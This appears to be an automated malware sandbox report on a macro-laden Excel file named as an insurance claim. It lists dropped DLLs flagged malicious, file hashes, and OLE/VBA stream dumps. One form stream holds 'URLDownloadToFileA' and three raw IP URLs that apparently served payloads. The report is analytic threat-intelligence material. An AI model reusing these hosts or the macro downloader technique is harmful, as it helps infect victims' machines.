      SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
      SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
      SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\Fiosa1.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.3741485480829125
      Encrypted:false
      SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
      MD5:15C440CEBA523F1FA008FAA03D09AC99
      SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
      SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
      SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\Fiosa2.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.3741485480829125
      Encrypted:false
      SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
      MD5:15C440CEBA523F1FA008FAA03D09AC99
      SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
      SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
      SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
      Malicious:true
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri Sep 24 10:05:02 2021, Security: 0
      Entropy (8bit):7.828790165256729
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Claim-680517779-09242021.xls
      File size:419328
      MD5:a5e00f88df7d7fc328f759cd99bcd3a0
      SHA1:b81aa5364f1fe9950dd0816082e9e2c7dcfa2375
      SHA256:a2e451f2873b727520bef058f84303de9991e4353aa5ed3589350b7ce6e92506
      SHA512:7a42c57506c748f6421f7b1006fd64d8c15575f34dca123f0f8028a5887353a20cc60b0637858bf40cb5a47a0c7472d07902f2d3820c71b4decaa10abe18a7bc
      SSDEEP:6144:Fk3hOdsylKlgxopeiBNhZF+E+W2kdAKTwapS+PS82DPz6ST4+e3G0Sb8duSgcVwx:e5Z8etSwuSgcfPwJjxwrcNDTfsXo/xr
      File Content Preview:........................>.......................................................b.......d.......f..............................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Claim-680517779-09242021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-24 09:05:02
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm1, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1
      VBA File Name:UserForm1
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      VBA File Name: Module1, Stream Size: 4112
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module1
      VBA File Name:Module1
      Stream Size:4112
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 30 0d 00 00 00 00 00 00 01 00 00 00 41 a1 0d 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 41 a1 f7 99 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: ThisWorkbook, Stream Size: 2774
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2774
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 a2 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff aa 04 00 00 5e 08 00 00 00 00 00 00 01 00 00 00 41 a1 88 0a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: UserForm1, Stream Size: 1180
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
      VBA File Name:UserForm1
      Stream Size:1180
      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . A . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 41 a1 c5 51 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.30164724619
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . 3 . B # . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 391141
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:391141
      Entropy:7.94597570807
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . d . % 8 . . . . . . . X . @
      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 661
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:661
      Entropy:5.27224586563
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 50 61 63 6b 61
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.35524796933
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 301
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:301
      Entropy:4.64742015018
      Base64 Encoded:True
      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
      Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 263
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/f
      File Type:data
      Stream Size:263
      Entropy:3.59027175124
      Base64 Encoded:False
      Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . O
      Data Raw:00 04 24 00 08 0c 10 0c 04 00 00 00 ff ff 00 00 04 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 01 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 a7 01 00 00 d4
      Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/o
      File Type:data
      Stream Size:272
      Entropy:3.7315998228
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 1 1 . 9 0 . 1 4 8 . 1 0 4 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 5 1 . 8 9 . 1 1 5 . 1 1 1 / . . . . . . . . . . . . . . . 5 . . . . . . .
      Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 33 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 03 18 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 01 f4
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3819
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:3819
      Entropy:4.49037503963
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2035
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2035
      Entropy:3.42846113886
      Base64 Encoded:False
      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . $ . . . . D . Q . . . . = s . . . . . . . .
      Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 6a 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
      Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: SVR2 executable (USS/370) not stripped - version 12587540, Stream Size: 865
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:SVR2 executable (USS/370) not stripped - version 12587540
      Stream Size:865
      Entropy:6.55213343791
      Base64 Encoded:True
